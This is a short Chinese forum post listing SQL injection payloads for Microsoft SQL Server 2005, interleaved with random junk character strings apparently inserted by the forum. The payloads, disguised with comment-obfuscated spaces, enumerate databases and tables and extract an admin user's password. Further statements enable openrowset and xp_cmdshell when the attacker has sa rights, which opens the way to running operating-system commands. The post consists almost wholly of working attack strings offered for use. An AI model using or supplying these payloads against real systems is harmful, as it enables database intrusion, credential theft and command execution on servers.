MSsql2005注入语句

admin

& G4 V. m4 z  u5 ?; `1 B
( g( z7 V( Q5 a[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

爆表语句,somedb部份是所要列的数据库，红色数字1累加
- `7 N7 u# Z! Y  {0 l7 e9 V- N
! ^( K. R4 _, H8 E5 V* `6 ~
7 j, o) h9 w5 ?8 d7 e[Copy to clipboard]CODE:
; t9 z# m# Y5 `  _4 w( z/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

爆字段语句，爆表admin里user='icerover'的密码段
- [8 s3 G) O2 X+ w( k' x9 U8 m- x" m

$ F" U, o& l; G* g& r' J6 U[Copy to clipboard]CODE:
  I3 j) t0 U; r9 Z; p5 E; m. j. f**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

mssql2005默认没有开xp_cmdshell的，openrowset也不能用
. p) I: u% u  X  ?. r" S# ^如果是sa权限，可以这样来开启
0 F# @2 K- d; d, p: T开启openrowset

: @, j) ~! ]/ a! r
[Copy to clipboard]CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
3 ?' `9 Z4 u# [6 R6 W/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
3 d7 n, k; X- t9 T* y
/ d& W# L, m  K9 P3 S6 `开启xp_cmdshell


[Copy to clipboard]CODE:
7 ]+ F' }8 v$ w3 PEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
5 b! c- E! A! r$ G) r& f' Q! Z, M7 T+ ZEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

" G: }2 j7 F( d  Q7 W( `ok,over~~晚安